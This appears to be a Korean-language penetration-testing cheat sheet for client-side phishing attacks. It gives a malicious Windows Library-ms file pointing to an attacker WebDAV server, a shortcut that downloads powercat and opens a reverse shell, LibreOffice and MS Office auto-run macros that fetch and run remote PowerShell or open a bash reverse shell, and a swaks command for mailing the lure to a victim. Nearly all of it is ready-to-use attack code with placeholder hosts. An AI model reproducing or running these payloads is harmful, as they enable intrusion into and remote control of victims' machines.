config.Library-ms + WebDav + ShortCut
- 피해자 config.Library.ms 실행
- kali WebDav 서버로 연결
- 웹루트에 위치하던 바로가기 파일 스크립트 실행
config.Library.ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList> <searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation> <url>http://KaliIP</url> </simpleLocation>
</searchConnectorDescription> </searchConnectorDescriptionList>
</libraryDescription>WebDav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /path/to/directoryShortCut
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<MyIP>:8000/powercat.ps1'); powercat -c <MyIP> -p 443 -e "powershell"LibreOffice Macro
Windows
Sub Main
Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://$IP/exploit.ps1')")
End SubLinux
Sub Main
Shell("bash -c 'bash -i >&/dev/tcp/$IP/$PORT 0>&1'")
End SubMS Office Macro
ThisWorkbook / ThisDocument 모듈
Sub Workbook_Open() / Document_Open()
MyMacro
End SubExcel:Workbook_Open()Word:Document_Open()
일반 모듈
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "cmd /c powershell /nop -w hidden /enc B64_Encoded"
Str = Str + "B64_Encoded"
<SNIP>
Str = Str + "B64_Encoded"
CreateObject("Wscript.Shell").Run Str, 0, True
End SubThisWorkbook및일반 모듈에서 모두MyMacro호출을 시도함. 둘 중 하나만 넣어도 동작은 함.- 환경에 따라 하나만 트리거되는 경우가 있어서 안전하게 둘 다 넣는 것
Swaks (Send Mail)
sudo swaks -t $receiver@example.com --from $sender@example.com --attach @attach_file_name --server $MailServerIP --body @body_file_name --header "Subject: DoesNotMatter" --suppress-data [-ap]-ap: auth password, SMTP 인증 패스워드를 지정--suppress-data: 터미널 출력에서 DATA 섹션(이메일 본문/헤더) 생략